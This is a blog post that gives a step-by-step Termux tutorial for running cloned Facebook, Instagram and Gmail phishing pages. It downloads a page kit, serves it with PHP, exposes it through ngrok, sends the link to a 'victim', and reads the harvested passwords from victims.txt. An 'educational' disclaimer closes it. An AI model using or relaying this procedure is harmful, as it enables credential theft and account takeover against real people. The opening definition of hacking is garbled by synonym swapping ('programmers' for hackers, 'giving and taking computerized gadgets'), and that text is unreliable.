Hacking—Definition, Types, Security, and the sky is the limit from there A regularly utilized hacking definition is the demonstration of giving and taking computerized gadgets and networks through unapproved admittance to a record or PC framework. Hacking isn't generally a malevolent demonstration, yet it is most ordinarily connected with criminal behavior and information robbery by digital lawbreakers. Hacking alludes to the abuse of gadgets like PCs, cell phones, tablets, and organizations to make harm or degenerate frameworks, accumulate data on clients, take information and archives, or upset information related action. A conventional perspective on programmers is a solitary rebel developer who is exceptionally gifted in coding and altering PC programming and equipment frameworks. Be that as it may, this tight view doesn't cover the genuine specialized nature of hacking. Programmers are progressively filling in refinement, utilizing covert assault strategies intended to ...
advanced phishing pages for termux tutorial
advanced phishing pages for termux - Hi guys if you are searching for advanced phishing pages for termux and searching for the best article to get the best explanation about
Today I'm here going to share the step by step tutorial about "advanced phishing pages for termux". By this article, you can get a lot of about phishing page download. And I'm damn sure that you will never get all these unique information like us on the internet anywhere else.
advanced phishing pages for termux tutorial
Hello, guys i am back with another amazing post so today we will get to know about the best and advanced phishing pages for termux and kali Linux users and i hope you will gonna like the scripts which we collected. So let's get started.
what are advanced phishing pages
Advanced phishing pages are phishing page's itself but they are new and real looking so that's why we can call them as advanced phishing pages. and this pages collection you can get Facebook phishing pages, Instagram pages, Gmail pages, and other most used social media platform pages which is up to date so for downloading and usage you can read our recent post and video tutorials or you can continue with this post itself.
#Folllow below steps
So, first of all, we need to download a folder called phish2k19 which contains all phishing pages so follow below steps
Download phish2k19 folder from belowgiven link and follow below steps.link :-
1. Open the Download folder and see if there is a phish2k19 folder is present or not ...after that unzip it in the same folder.
noob hackers
2. Now open Termux app and follow below commands.
# apt-get update$ apt-get upgrade
# termux-setup-storage allow a pop-up storage permission.
# pkg install php
Now you need ngrok for further process if you don't know about ngrok then watch the video of ngrok on my channel.
3. Now open new session in Termux
# ls
# cd /sdcard
# ls
# cd Download
# cp phish2k19 $HOME
# ls
Now once again open another session and be careful in this step.
# ls
# ./ngrok http (any 4 digit number)
ex :- ./ngrok http 6383
Don't forget to turn on device hotspot and data because the ngrok server needs a connection to work so enabling hotspot
Note:- Don't remove or close the app in background or else you will lose connection. So keep termux running in the ground.
4. Now open new session and
# ls
# cd phish2k19 (in this folder select any one of the social media phish folders and again open that folder by cd commands)
# php -S localhost:(here you need to put the port number which you used in your grok server starting time)
ex :- php -S localhost:6383
now click on the r button in the keyboard go to ngrok session and copy anyone Forwarding link in ngrok session.
ex :- http://70393160.ngrok.iolike above one.
5. And now send that copied link to your victim and when he clicks on the and fill his all credentials now his account has been hacked. To check victim details.
6. Come back to termux and open PHP session (3rd step folder) in that session click ctrl+c or volume up and c to stop the attack Now in that same folder,you can seevictims.txt and advanced ip.txt and lot more so you can test them if you are victim filled his details then you can see this type of txt file in phish2k19 folder now to open and access victims pass.and gmail you need to apply this command
$ cat victims.txt
$ cat ip.txt
"Boom...! You are done. You just hacked your victim and got his all login details and now you can use it.
Note:- This tutorial doe's not encouraged anyone to do illegal activity. And this tutorial is only meant to share educational and informational things about a particular topic.
Comments
Post a Comment